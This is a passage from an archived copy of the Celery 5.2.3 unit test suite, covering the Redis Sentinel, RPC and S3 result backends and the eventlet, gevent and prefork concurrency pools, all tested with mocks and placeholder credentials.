test_on_chord_part_return_timeout(self, complex_header_result): tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) try: self.app.conf.result_chord_join_timeout += 1.0 for task, result_val in zip(tasks, itertools.cycle((42, ))): self.b.on_chord_part_return( task.request, states.SUCCESS, result_val, ) finally: self.app.conf.result_chord_join_timeout -= 1.0 join_func = complex_header_result.return_value.join_native join_func.assert_called_once_with(timeout=4.0, propagate=True) @pytest.mark.parametrize("supports_native_join", (True, False)) def test_on_chord_part_return( self, complex_header_result, supports_native_join, ): mock_result_obj = complex_header_result.return_value mock_result_obj.supports_native_join = supports_native_join tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) with self.chord_context(10) as (tasks, request, callback): for task, result_val in zip(tasks, itertools.cycle((42, ))): self.b.on_chord_part_return( task.request, states.SUCCESS, result_val, ) # Confirm that `zadd` was called even though we won't end up # using the data pushed into the sorted set assert self.b.client.zadd.call_count == 1 self.b.client.zadd.reset_mock() # Confirm that neither `zrange` not `lrange` were called 
self.b.client.zrange.assert_not_called() self.b.client.lrange.assert_not_called() # Confirm that the `GroupResult.restore` mock was called complex_header_result.assert_called_once_with(request.group) # Confirm the the callback was called with the `join()`ed group result if supports_native_join: expected_join = mock_result_obj.join_native else: expected_join = mock_result_obj.join callback.delay.assert_called_once_with(expected_join()) class test_SentinelBackend: def get_backend(self): from celery.backends.redis import SentinelBackend class _SentinelBackend(SentinelBackend): redis = redis sentinel = sentinel return _SentinelBackend def get_E_LOST(self): from celery.backends.redis import E_LOST return E_LOST def setup(self): self.Backend = self.get_backend() self.E_LOST = self.get_E_LOST() self.b = self.Backend(app=self.app) @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): pytest.importorskip('redis') from celery.backends.redis import SentinelBackend x = SentinelBackend(app=self.app) assert loads(dumps(x)) def test_no_redis(self): self.Backend.redis = None with pytest.raises(ImproperlyConfigured): self.Backend(app=self.app) def test_url(self): self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) assert x.connparams assert "host" not in x.connparams assert x.connparams['db'] == 1 assert "port" not in x.connparams assert x.connparams['password'] == "test" assert len(x.connparams['hosts']) == 2 expected_hosts = ["github.com", "github.com"] found_hosts = [cp['host'] for cp in x.connparams['hosts']] assert found_hosts == expected_hosts expected_ports = [123, 124] found_ports = [cp['port'] for cp in x.connparams['hosts']] assert found_ports == expected_ports expected_passwords = ["test", "test"] found_passwords = [cp['password'] for cp in x.connparams['hosts']] assert found_passwords == expected_passwords expected_dbs = [1, 1] found_dbs = [cp['db'] for cp in x.connparams['hosts']] assert found_dbs == expected_dbs # By default passwords should be sanitized display_url = x.as_uri() assert "test" not in display_url # We can choose not to sanitize with the `include_password` argument unsanitized_display_url = x.as_uri(include_password=True) assert unsanitized_display_url == x.url # or to explicitly sanitize forcibly_sanitized_display_url = x.as_uri(include_password=False) assert forcibly_sanitized_display_url == display_url def test_get_sentinel_instance(self): x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) sentinel_instance = x._get_sentinel_instance(**x.connparams) assert sentinel_instance.sentinel_kwargs == {} assert sentinel_instance.connection_kwargs['db'] == 1 assert sentinel_instance.connection_kwargs['password'] == "test" assert len(sentinel_instance.sentinels) == 2 def test_get_pool(self): x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) pool = x._get_pool(**x.connparams) assert pool def test_backend_ssl(self): pytest.importorskip('redis') from celery.backends.redis import SentinelBackend self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': "CERT_REQUIRED", 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = SentinelBackend( 
'sentinel://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert len(x.connparams['hosts']) == 1 assert x.connparams['hosts'][0]['host'] == 'vandelay.com' assert x.connparams['hosts'][0]['db'] == 1 assert x.connparams['hosts'][0]['port'] == 123 assert x.connparams['hosts'][0]['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from celery.backends.redis import SentinelManagedSSLConnection assert x.connparams['connection_class'] is SentinelManagedSSLConnection ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_rpc.py0000664000175000017500000000714500000000000020075 0ustar00asifasif00000000000000import uuid from unittest.mock import Mock, patch import pytest from celery import chord, group from celery._state import _task_stack from celery.backends.rpc import RPCBackend class test_RPCResultConsumer: def get_backend(self): return RPCBackend(app=self.app) def get_consumer(self): return self.get_backend().result_consumer def test_drain_events_before_start(self): consumer = self.get_consumer() # drain_events shouldn't crash when called before start consumer.drain_events(0.001) class test_RPCBackend: def setup(self): self.b = RPCBackend(app=self.app) def test_oid(self): oid = self.b.oid oid2 = self.b.oid assert uuid.UUID(oid) assert oid == oid2 assert oid == self.app.thread_oid def test_oid_threads(self): # Verify that two RPC backends executed in different threads # has different oid. 
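# --- Illustrative sketch (not part of the original test) -------------------
# The check below runs a second RPC backend in a worker thread and compares
# its oid with the current thread's.  The thread plumbing is plain
# ``concurrent.futures``: submit() returns a Future and result() blocks for
# the callable's return value.  The helper name here is hypothetical:
def _demo_run_in_other_thread(fn):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=1) as executor:
        return executor.submit(fn).result()
# ---------------------------------------------------------------------------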
oid = self.b.oid from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: RPCBackend(app=self.app).oid) thread_oid = future.result() assert uuid.UUID(oid) assert uuid.UUID(thread_oid) assert oid == self.app.thread_oid assert thread_oid != oid def test_interface(self): self.b.on_reply_declare('task_id') def test_ensure_chords_allowed(self): with pytest.raises(NotImplementedError): self.b.ensure_chords_allowed() def test_apply_chord(self): with pytest.raises(NotImplementedError): self.b.apply_chord(self.app.GroupResult(), None) @pytest.mark.celery(result_backend='rpc') def test_chord_raises_error(self): with pytest.raises(NotImplementedError): chord(self.add.s(i, i) for i in range(10))(self.add.s([2])) @pytest.mark.celery(result_backend='rpc') def test_chain_with_chord_raises_error(self): with pytest.raises(NotImplementedError): (self.add.s(2, 2) | group(self.add.s(2, 2), self.add.s(5, 6)) | self.add.s()).delay() def test_destination_for(self): req = Mock(name='request') req.reply_to = 'reply_to' req.correlation_id = 'corid' assert self.b.destination_for('task_id', req) == ('reply_to', 'corid') task = Mock() _task_stack.push(task) try: task.request.reply_to = 'reply_to' task.request.correlation_id = 'corid' assert self.b.destination_for('task_id', None) == ( 'reply_to', 'corid', ) finally: _task_stack.pop() with pytest.raises(RuntimeError): self.b.destination_for('task_id', None) def test_binding(self): queue = self.b.binding assert queue.name == self.b.oid assert queue.exchange == self.b.exchange assert queue.routing_key == self.b.oid assert not queue.durable assert queue.auto_delete def test_create_binding(self): assert self.b._create_binding('id') == self.b.binding def test_on_task_call(self): with patch('celery.backends.rpc.maybe_declare') as md: with self.app.amqp.producer_pool.acquire() as prod: self.b.on_task_call(prod, 'task_id'), md.assert_called_with( self.b.binding(prod.channel), retry=True, ) def test_create_exchange(self): ex = self.b._create_exchange('name') assert isinstance(ex, self.b.Exchange) assert ex.name == '' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_s3.py0000664000175000017500000001477600000000000017646 0ustar00asifasif00000000000000from unittest.mock import patch import boto3 import pytest from botocore.exceptions import ClientError from moto import mock_s3 from celery import states from celery.backends.s3 import S3Backend from celery.exceptions import ImproperlyConfigured class test_S3Backend: @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_missing_aws_credentials(self, mock_load_credentials): self.app.conf.s3_access_key_id = None self.app.conf.s3_secret_access_key = None self.app.conf.s3_bucket = 'bucket' mock_load_credentials.return_value = None with pytest.raises(ImproperlyConfigured, match="Missing aws s3 creds"): S3Backend(app=self.app) @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_no_credentials_in_config_attempts_to_load_credentials(self, mock_load_credentials): self.app.conf.s3_access_key_id = None self.app.conf.s3_secret_access_key = None self.app.conf.s3_bucket = 'bucket' S3Backend(app=self.app) mock_load_credentials.assert_called_once() @patch('botocore.credentials.CredentialResolver.load_credentials') def test_with_credentials_in_config_does_not_search_for_credentials(self, mock_load_credentials): 
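# --- Illustrative sketch (not part of the original test) -------------------
# When the app config supplies both an access key id and a secret, the
# backend is expected to hand them straight to boto3 instead of invoking
# the credential resolver.  The boto3 call the surrounding tests assert on
# looks roughly like this (helper name and values are placeholders):
def _example_s3_session(key_id, secret, region=None):
    import boto3
    # Explicit credentials: no CredentialResolver.load_credentials() lookup.
    return boto3.Session(
        aws_access_key_id=key_id,
        aws_secret_access_key=secret,
        region_name=region,
    )
# ---------------------------------------------------------------------------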
self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' S3Backend(app=self.app) mock_load_credentials.assert_not_called() def test_with_no_given_bucket(self): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = None with pytest.raises(ImproperlyConfigured, match='Missing bucket name'): S3Backend(app=self.app) @pytest.mark.parametrize('aws_region', [None, 'us-east-1'], ids=['No given aws region', 'Specific aws region']) @patch('celery.backends.s3.boto3') def test_it_creates_an_aws_s3_connection(self, mock_boto3, aws_region): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' self.app.conf.s3_region = aws_region S3Backend(app=self.app) mock_boto3.Session.assert_called_once_with( aws_access_key_id='somekeyid', aws_secret_access_key='somesecret', region_name=aws_region) @pytest.mark.parametrize('endpoint_url', [None, 'https://custom.s3'], ids=['No given endpoint url', 'Custom endpoint url']) @patch('celery.backends.s3.boto3') def test_it_creates_an_aws_s3_resource(self, mock_boto3, endpoint_url): self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' self.app.conf.s3_endpoint_url = endpoint_url S3Backend(app=self.app) mock_boto3.Session().resource.assert_called_once_with( 's3', endpoint_url=endpoint_url) @pytest.mark.parametrize("key", ['uuid', b'uuid']) @mock_s3 def test_set_and_get_a_key(self, key): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend._set_with_state(key, 'another_status', states.SUCCESS) assert s3_backend.get(key) == 'another_status' @mock_s3 def test_set_and_get_a_result(self): self._mock_s3_resource() self.app.conf.result_serializer = 'pickle' self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend.store_result('foo', 'baar', 'STARTED') value = s3_backend.get_result('foo') assert value == 'baar' @mock_s3 def test_get_a_missing_key(self): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) result = s3_backend.get('uuidddd') assert result is None @patch('celery.backends.s3.boto3') def test_with_error_while_getting_key(self, mock_boto3): error = ClientError({'Error': {'Code': '403', 'Message': 'Permission denied'}}, 'error') mock_boto3.Session().resource().Object().load.side_effect = error self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) with pytest.raises(ClientError): s3_backend.get('uuidddd') @pytest.mark.parametrize("key", ['uuid', b'uuid']) @mock_s3 def test_delete_a_key(self, key): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket' s3_backend = S3Backend(app=self.app) s3_backend._set_with_state(key, 'another_status', states.SUCCESS) assert s3_backend.get(key) == 'another_status' s3_backend.delete(key) assert s3_backend.get(key) is None @mock_s3 def 
test_with_a_non_existing_bucket(self): self._mock_s3_resource() self.app.conf.s3_access_key_id = 'somekeyid' self.app.conf.s3_secret_access_key = 'somesecret' self.app.conf.s3_bucket = 'bucket_not_exists' s3_backend = S3Backend(app=self.app) with pytest.raises(ClientError, match=r'.*The specified bucket does not exist'): s3_backend._set_with_state('uuid', 'another_status', states.SUCCESS) def _mock_s3_resource(self): # Create AWS s3 Bucket for moto. session = boto3.Session( aws_access_key_id='moto_key_id', aws_secret_access_key='moto_secret_key', region_name='us-east-1' ) s3 = session.resource('s3') s3.create_bucket(Bucket='bucket') ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7997568 celery-5.2.3/t/unit/bin/0000775000175000017500000000000000000000000014667 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/__init__.py0000664000175000017500000000000000000000000016766 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/celery.py0000664000175000017500000000002200000000000016516 0ustar00asifasif00000000000000# here for a test ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7997568 celery-5.2.3/t/unit/bin/proj/0000775000175000017500000000000000000000000015641 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/__init__.py0000664000175000017500000000010000000000000017741 0ustar00asifasif00000000000000from celery import Celery hello = Celery(set_as_current=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/app.py0000664000175000017500000000007600000000000016776 0ustar00asifasif00000000000000from celery import Celery app = Celery(set_as_current=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/proj/app2.py0000664000175000017500000000003400000000000017052 0ustar00asifasif00000000000000import celery # noqa: F401 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/bin/test_multi.py0000664000175000017500000000000000000000000017420 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.807757 celery-5.2.3/t/unit/concurrency/0000775000175000017500000000000000000000000016451 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/__init__.py0000664000175000017500000000000000000000000020550 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_concurrency.py0000664000175000017500000001271100000000000022416 0ustar00asifasif00000000000000import importlib import os import sys from itertools import count from unittest.mock import Mock, patch import pytest from celery import concurrency from celery.concurrency.base import BasePool, apply_target from celery.exceptions import WorkerShutdown, 
WorkerTerminate class test_BasePool: def test_apply_target(self): scratch = {} counter = count(0) def gen_callback(name, retval=None): def callback(*args): scratch[name] = (next(counter), args) return retval return callback apply_target(gen_callback('target', 42), args=(8, 16), callback=gen_callback('callback'), accept_callback=gen_callback('accept_callback')) assert scratch['target'] == (1, (8, 16)) assert scratch['callback'] == (2, (42,)) pa1 = scratch['accept_callback'] assert pa1[0] == 0 assert pa1[1][0] == os.getpid() assert pa1[1][1] # No accept callback scratch.clear() apply_target(gen_callback('target', 42), args=(8, 16), callback=gen_callback('callback'), accept_callback=None) assert scratch == { 'target': (3, (8, 16)), 'callback': (4, (42,)), } def test_apply_target__propagate(self): target = Mock(name='target') target.side_effect = KeyError() with pytest.raises(KeyError): apply_target(target, propagate=(KeyError,)) def test_apply_target__raises(self): target = Mock(name='target') target.side_effect = KeyError() with pytest.raises(KeyError): apply_target(target) def test_apply_target__raises_WorkerShutdown(self): target = Mock(name='target') target.side_effect = WorkerShutdown() with pytest.raises(WorkerShutdown): apply_target(target) def test_apply_target__raises_WorkerTerminate(self): target = Mock(name='target') target.side_effect = WorkerTerminate() with pytest.raises(WorkerTerminate): apply_target(target) def test_apply_target__raises_BaseException(self): target = Mock(name='target') callback = Mock(name='callback') target.side_effect = BaseException() apply_target(target, callback=callback) callback.assert_called() @patch('celery.concurrency.base.reraise') def test_apply_target__raises_BaseException_raises_else(self, reraise): target = Mock(name='target') callback = Mock(name='callback') reraise.side_effect = KeyError() target.side_effect = BaseException() with pytest.raises(KeyError): apply_target(target, callback=callback) callback.assert_not_called() def test_does_not_debug(self): x = BasePool(10) x._does_debug = False x.apply_async(object) def test_num_processes(self): assert BasePool(7).num_processes == 7 def test_interface_on_start(self): BasePool(10).on_start() def test_interface_on_stop(self): BasePool(10).on_stop() def test_interface_on_apply(self): BasePool(10).on_apply() def test_interface_info(self): assert BasePool(10).info == { 'max-concurrency': 10, } def test_interface_flush(self): assert BasePool(10).flush() is None def test_active(self): p = BasePool(10) assert not p.active p._state = p.RUN assert p.active def test_restart(self): p = BasePool(10) with pytest.raises(NotImplementedError): p.restart() def test_interface_on_terminate(self): p = BasePool(10) p.on_terminate() def test_interface_terminate_job(self): with pytest.raises(NotImplementedError): BasePool(10).terminate_job(101) def test_interface_did_start_ok(self): assert BasePool(10).did_start_ok() def test_interface_register_with_event_loop(self): assert BasePool(10).register_with_event_loop(Mock()) is None def test_interface_on_soft_timeout(self): assert BasePool(10).on_soft_timeout(Mock()) is None def test_interface_on_hard_timeout(self): assert BasePool(10).on_hard_timeout(Mock()) is None def test_interface_close(self): p = BasePool(10) p.on_close = Mock() p.close() assert p._state == p.CLOSE p.on_close.assert_called_with() def test_interface_no_close(self): assert BasePool(10).on_close() is None class test_get_available_pool_names: def 
test_no_concurrent_futures__returns_no_threads_pool_name(self): expected_pool_names = ( 'prefork', 'eventlet', 'gevent', 'solo', 'processes', ) with patch.dict(sys.modules, {'concurrent.futures': None}): importlib.reload(concurrency) assert concurrency.get_available_pool_names() == expected_pool_names def test_concurrent_futures__returns_threads_pool_name(self): expected_pool_names = ( 'prefork', 'eventlet', 'gevent', 'solo', 'processes', 'threads', ) with patch.dict(sys.modules, {'concurrent.futures': Mock()}): importlib.reload(concurrency) assert concurrency.get_available_pool_names() == expected_pool_names ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_eventlet.py0000664000175000017500000001103400000000000021707 0ustar00asifasif00000000000000import sys from unittest.mock import Mock, patch import pytest pytest.importorskip('eventlet') from greenlet import GreenletExit # noqa import t.skip # noqa from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa eventlet_modules = ( 'eventlet', 'eventlet.debug', 'eventlet.greenthread', 'eventlet.greenpool', 'greenlet', ) @t.skip.if_pypy class EventletCase: def setup(self): self.patching.modules(*eventlet_modules) def teardown(self): for mod in [mod for mod in sys.modules if mod.startswith('eventlet')]: try: del(sys.modules[mod]) except KeyError: pass class test_aaa_eventlet_patch(EventletCase): def test_aaa_is_patched(self): with patch('eventlet.monkey_patch', create=True) as monkey_patch: from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'eventlet']) monkey_patch.assert_called_with() @patch('eventlet.debug.hub_blocking_detection', create=True) @patch('eventlet.monkey_patch', create=True) def test_aaa_blockdetecet( self, monkey_patch, hub_blocking_detection, patching): patching.setenv('EVENTLET_NOBLOCK', '10.3') from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'eventlet']) monkey_patch.assert_called_with() hub_blocking_detection.assert_called_with(10.3, 10.3) class test_Timer(EventletCase): @pytest.fixture(autouse=True) def setup_patches(self, patching): self.spawn_after = patching('eventlet.greenthread.spawn_after') self.GreenletExit = patching('greenlet.GreenletExit') def test_sched(self): x = Timer() x.GreenletExit = KeyError entry = Mock() g = x._enter(1, 0, entry) assert x.queue x._entry_exit(g, entry) g.wait.side_effect = KeyError() x._entry_exit(g, entry) entry.cancel.assert_called_with() assert not x._queue x._queue.add(g) x.clear() x._queue.add(g) g.cancel.side_effect = KeyError() x.clear() def test_cancel(self): x = Timer() tref = Mock(name='tref') x.cancel(tref) tref.cancel.assert_called_with() x.GreenletExit = KeyError tref.cancel.side_effect = KeyError() x.cancel(tref) class test_TaskPool(EventletCase): @pytest.fixture(autouse=True) def setup_patches(self, patching): self.GreenPool = patching('eventlet.greenpool.GreenPool') self.greenthread = patching('eventlet.greenthread') def test_pool(self): x = TaskPool() x.on_start() x.on_stop() x.on_apply(Mock()) x._pool = None x.on_stop() assert len(x._pool_map.keys()) == 1 assert x.getpid() @patch('celery.concurrency.eventlet.base') def test_apply_target(self, base): apply_target(Mock(), getpid=Mock()) base.apply_target.assert_called() def test_grow(self): x = TaskPool(10) x._pool = Mock(name='_pool') x.grow(2) assert x.limit == 12 x._pool.resize.assert_called_with(12) def test_shrink(self): x = TaskPool(10) x._pool = 
Mock(name='_pool') x.shrink(2) assert x.limit == 8 x._pool.resize.assert_called_with(8) def test_get_info(self): x = TaskPool(10) x._pool = Mock(name='_pool') assert x._get_info() == { 'max-concurrency': 10, 'free-threads': x._pool.free(), 'running-threads': x._pool.running(), } def test_terminate_job(self): func = Mock() pool = TaskPool(10) pool.on_start() pool.on_apply(func) assert len(pool._pool_map.keys()) == 1 pid = list(pool._pool_map.keys())[0] greenlet = pool._pool_map[pid] pool.terminate_job(pid) greenlet.link.assert_called_once() greenlet.kill.assert_called_once() def test_make_killable_target(self): def valid_target(): return "some result..." def terminating_target(): raise GreenletExit() assert TaskPool._make_killable_target(valid_target)() == "some result..." assert TaskPool._make_killable_target(terminating_target)() == (False, None, None) def test_cleanup_after_job_finish(self): testMap = {'1': None} TaskPool._cleanup_after_job_finish(None, testMap, '1') assert len(testMap) == 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_gevent.py0000664000175000017500000000607400000000000021361 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.concurrency.gevent import TaskPool, Timer, apply_timeout gevent_modules = ( 'gevent', 'gevent.greenlet', 'gevent.monkey', 'gevent.pool', 'gevent.signal', 'greenlet', ) class test_gevent_patch: def test_is_patched(self): self.patching.modules(*gevent_modules) patch_all = self.patching('gevent.monkey.patch_all') import gevent gevent.version_info = (1, 0, 0) from celery import maybe_patch_concurrency maybe_patch_concurrency(['x', '-P', 'gevent']) patch_all.assert_called() class test_Timer: def setup(self): self.patching.modules(*gevent_modules) self.greenlet = self.patching('gevent.greenlet') self.GreenletExit = self.patching('gevent.greenlet.GreenletExit') def test_sched(self): self.greenlet.Greenlet = object x = Timer() self.greenlet.Greenlet = Mock() x._Greenlet.spawn_later = Mock() x._GreenletExit = KeyError entry = Mock() g = x._enter(1, 0, entry) assert x.queue x._entry_exit(g) g.kill.assert_called_with() assert not x._queue x._queue.add(g) x.clear() x._queue.add(g) g.kill.side_effect = KeyError() x.clear() g = x._Greenlet() g.cancel() class test_TaskPool: def setup(self): self.patching.modules(*gevent_modules) self.spawn_raw = self.patching('gevent.spawn_raw') self.Pool = self.patching('gevent.pool.Pool') def test_pool(self): x = TaskPool() x.on_start() x.on_stop() x.on_apply(Mock()) x._pool = None x.on_stop() x._pool = Mock() x._pool._semaphore.counter = 1 x._pool.size = 1 x.grow() assert x._pool.size == 2 assert x._pool._semaphore.counter == 2 x.shrink() assert x._pool.size, 1 assert x._pool._semaphore.counter == 1 x._pool = [4, 5, 6] assert x.num_processes == 3 class test_apply_timeout: def test_apply_timeout(self): self.patching.modules(*gevent_modules) class Timeout(Exception): value = None def __init__(self, value): self.__class__.value = value def __enter__(self): return self def __exit__(self, *exc_info): pass timeout_callback = Mock(name='timeout_callback') apply_target = Mock(name='apply_target') apply_timeout( Mock(), timeout=10, callback=Mock(name='callback'), timeout_callback=timeout_callback, apply_target=apply_target, Timeout=Timeout, ) assert Timeout.value == 10 apply_target.assert_called() apply_target.side_effect = Timeout(10) apply_timeout( Mock(), timeout=10, callback=Mock(), 
timeout_callback=timeout_callback, apply_target=apply_target, Timeout=Timeout, ) timeout_callback.assert_called_with(False, 10) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/concurrency/test_pool.py0000664000175000017500000000344600000000000021042 0ustar00asifasif00000000000000import itertools import time import pytest from billiard.einfo import ExceptionInfo pytest.importorskip('multiprocessing') def do_something(i): return i * i def long_something(): time.sleep(1) def raise_something(i): try: raise KeyError('FOO EXCEPTION') except KeyError: return ExceptionInfo() class test_TaskPool: def setup(self): from celery.concurrency.prefork import TaskPool self.TaskPool = TaskPool def test_attrs(self): p = self.TaskPool(2) assert p.limit == 2 assert p._pool is None def x_apply(self): p = self.TaskPool(2) p.start() scratchpad = {} proc_counter = itertools.count() def mycallback(ret_value): process = next(proc_counter) scratchpad[process] = {} scratchpad[process]['ret_value'] = ret_value myerrback = mycallback res = p.apply_async(do_something, args=[10], callback=mycallback) res2 = p.apply_async(raise_something, args=[10], errback=myerrback) res3 = p.apply_async(do_something, args=[20], callback=mycallback) assert res.get() == 100 time.sleep(0.5) assert scratchpad.get(0)['ret_value'] == 100 assert isinstance(res2.get(), ExceptionInfo) assert scratchpad.get(1) time.sleep(1) assert isinstance(scratchpad[1]['ret_value'], ExceptionInfo) assert scratchpad[1]['ret_value'].exception.args == ('FOO EXCEPTION',) assert res3.get() == 400 time.sleep(0.5) assert scratchpad.get(2)['ret_value'] == 400 res3 = p.apply_async(do_something, args=[30], callback=mycallback) assert res3.get() == 900 time.sleep(0.5) assert scratchpad.get(3)['ret_value'] == 900 p.stop() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/concurrency/test_prefork.py0000664000175000017500000003630200000000000021536 0ustar00asifasif00000000000000import errno import os import socket from itertools import cycle from unittest.mock import Mock, patch import pytest import t.skip from celery.app.defaults import DEFAULTS from celery.concurrency.asynpool import iterate_file_descriptors_safely from celery.utils.collections import AttributeDict from celery.utils.functional import noop from celery.utils.objects import Bunch try: from celery.concurrency import asynpool from celery.concurrency import prefork as mp except ImportError: class _mp: RUN = 0x1 class TaskPool: _pool = Mock() def __init__(self, *args, **kwargs): pass def start(self): pass def stop(self): pass def apply_async(self, *args, **kwargs): pass mp = _mp() asynpool = None class MockResult: def __init__(self, value, pid): self.value = value self.pid = pid def worker_pids(self): return [self.pid] def get(self): return self.value @patch('celery.platforms.set_mp_process_title') class test_process_initializer: @staticmethod def Loader(*args, **kwargs): loader = Mock(*args, **kwargs) loader.conf = {} loader.override_backends = {} return loader @patch('celery.platforms.signals') def test_process_initializer(self, _signals, set_mp_process_title, restore_logging): from celery import signals from celery._state import _tls from celery.concurrency.prefork import (WORKER_SIGIGNORE, WORKER_SIGRESET, process_initializer) on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) with self.Celery(loader=self.Loader) 
as app: app.conf = AttributeDict(DEFAULTS) process_initializer(app, 'awesome.worker.com') _signals.ignore.assert_any_call(*WORKER_SIGIGNORE) _signals.reset.assert_any_call(*WORKER_SIGRESET) assert app.loader.init_worker.call_count on_worker_process_init.assert_called() assert _tls.current_app is app set_mp_process_title.assert_called_with( 'celeryd', hostname='awesome.worker.com', ) with patch('celery.app.trace.setup_worker_optimizations') as S: os.environ['FORKED_BY_MULTIPROCESSING'] = '1' try: process_initializer(app, 'luke.worker.com') S.assert_called_with(app, 'luke.worker.com') finally: os.environ.pop('FORKED_BY_MULTIPROCESSING', None) os.environ['CELERY_LOG_FILE'] = 'worker%I.log' app.log.setup = Mock(name='log_setup') try: process_initializer(app, 'luke.worker.com') finally: os.environ.pop('CELERY_LOG_FILE', None) @patch('celery.platforms.set_pdeathsig') def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging): from celery import signals on_worker_process_init = Mock() signals.worker_process_init.connect(on_worker_process_init) from celery.concurrency.prefork import process_initializer with self.Celery(loader=self.Loader) as app: app.conf = AttributeDict(DEFAULTS) process_initializer(app, 'awesome.worker.com') _set_pdeathsig.assert_called_once_with('SIGKILL') class test_process_destructor: @patch('celery.concurrency.prefork.signals') def test_process_destructor(self, signals): mp.process_destructor(13, -3) signals.worker_process_shutdown.send.assert_called_with( sender=None, pid=13, exitcode=-3, ) class MockPool: started = False closed = False joined = False terminated = False _state = None def __init__(self, *args, **kwargs): self.started = True self._timeout_handler = Mock() self._result_handler = Mock() self.maintain_pool = Mock() self._state = mp.RUN self._processes = kwargs.get('processes') self._proc_alive_timeout = kwargs.get('proc_alive_timeout') self._pool = [Bunch(pid=i, inqW_fd=1, outqR_fd=2) for i in range(self._processes)] self._current_proc = cycle(range(self._processes)) def close(self): self.closed = True self._state = 'CLOSE' def join(self): self.joined = True def terminate(self): self.terminated 